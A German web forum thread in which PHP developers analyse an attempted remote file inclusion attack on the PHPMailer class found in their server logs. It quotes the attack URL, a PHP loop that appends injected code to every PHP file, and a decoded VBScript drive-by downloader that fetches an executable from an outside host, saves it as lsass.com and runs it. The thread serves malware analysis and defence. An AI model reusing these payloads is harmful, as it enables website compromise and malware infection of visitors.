ich verwende die Mail-Klasse phpmailer
Bei Auswertungen von Log-Files wurde dies gefunden
phpmailer/class.phpmailer.php?lang_path=http://usuarios.arnet.com.ar/larry123/safe.txt?
(was - aus irgendwelchen Gründen auch immer - bei mir nicht funktionierte)
Gibt es in der Klassen-Sammlung noch weitere lücken?
oder ist der wechsel auf eine andere Klasse z.B.
http://www.swiftmailer.org/
sinnvoll.
ciao
ralf
--
Mein Skizzenbuch
http://blog.myoos.de/
Der Eintrag besagt lediglich, dass jemand /versucht/ hat, eine
Sicherheitslücke auszunutzen. So what? Dass es nicht geklappt hat, ist
wohl ein Hinweis darauf, dass die Lücke nicht mehr existiert oder bei
Dir nicht ausgenutzt werden kann.
(sowas sind automatisierte Angriffe, anders ist wohl kaum zu erklären,
das Leute auf meinem Webspace auf ein nicht vorhandenes Typo3 zugreifen)
Ob die Klasse noch weitere Lücken hat? Vermutlich, wie andere Klassen
auch. Wenn Du solche direkten Angriffe verhindern willst, kannst Du auch
einfach eine .htaccess in das Klassenverzeichnis stecken, dann kann
niemand mehr von aussen auf die Klassendateien selber zugreifen, was ja
auch nicht nötig ist.
--
Mein Zeugs:
http://www.hadanite-marasek.de/classes.php
http://www.objektivsuche.de/
> (sowas sind automatisierte Angriffe, anders ist wohl kaum zu erklären,
> das Leute auf meinem Webspace auf ein nicht vorhandenes Typo3 zugreifen)
Siehe auch <http://de.wikipedia.org/wiki/Skriptkiddie>
bye, Dirk
> http://usuarios.arnet.com.ar/larry123/safe.txt
Was es alles gibt!
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
Sorgt anscheinend dafür, dass ein iframe an alle php.*, htm.* und
*.html-Dokumente angehängt wird. Dem besseren Ranking dient es
offensichtlich nicht, denn der Zielurl enthält ein VBS-Skript:
http://usuarios.arnet.com.ar/alvarezluque/morgan.html
Mein Versuch, das Skript in php zu übersetzen, um zu ergründen was
hinterher "document.write s" im Klartext heißt, scheiterte. Hat jemand ein
besseres Händchen?
Martin
> http://usuarios.arnet.com.ar/larry123/safe.txt
Was es alles gibt!
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
Sorgt anscheinend dafür, dass ein iframe an alle *.php, *.htm und
>http://usuarios.arnet.com.ar/alvarezluque/morgan.html
>
>Mein Versuch, das Skript in php zu übersetzen, um zu ergründen was
>hinterher "document.write s" im Klartext heißt, scheiterte. Hat jemand ein
>besseres Händchen?
Hier mein PHP-Code:
<?php
header('Content-Type: text/plain');
$d = [Code aus dem VBS-Script];
$s = '';
for ($i = 1, $c = strlen($d); $i <= $c; $i++) {
$b = substr($d, $i-1, 1);
$a = ord($b);
switch ($a) {
case 1: $a = 9; break;
case 2: $a = 10; break;
case 3: $a = 13; break;
case 4: $a = 34;
}
if ($a <= 31 && $a >= 14) {
$s .= substr($s, strlen($s)-1-(ord(substr($d, $i, 1))-36+90*
(ord(substr($d, $i+1, 1))-35)), $a-14+4);
$i += 2;
} else {
if ($a >= 41 && $a <= 127) {
$a--;
}
$s .= ($a < 127) ? chr($a) : $b;
}
}
print $s;
?>
Und hier das Ergebnis:
<script language="VBScript">
on error resume next
dl = "http://usuarios.arnet.com.ar/alvarezluque/flash7.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP","")
set S = df.createobject("Adodb.Stream","")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="lsass.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script></body></html><script>
Micha
> Und hier das Ergebnis:
Danke für die Mühe!
Was ist denn das, wenn es fertig ist?
Eine verklausulierte Konsruktion zum Download einer Schadsoftware, die dann
per ShellExecute gestartet wird?
Martin
>Was ist denn das, wenn es fertig ist?
>
>Eine verklausulierte Konsruktion zum Download einer Schadsoftware, die dann
>per ShellExecute gestartet wird?
So sieht's jedenfalls aus. Die EXE-Datei (ca. 1MB) hab ich mir nun
allerdings nicht weiter angeschaut ...
Micha
> Die EXE-Datei (ca. 1MB) hab ich mir nun
> allerdings nicht weiter angeschaut ...
Der Bundestrojaner kommt ja angeblich nur per Behördenpost. Machen
Terroristen E-Mails von Bundeverteidigungsministerium auf?
Martin
Die E-Mail enthält dann einen Link, mit welchem der Trojaner von
<http://www.wolfgang-schaeuble.de/> runtergeladen werden kann ...
SCNR
Micha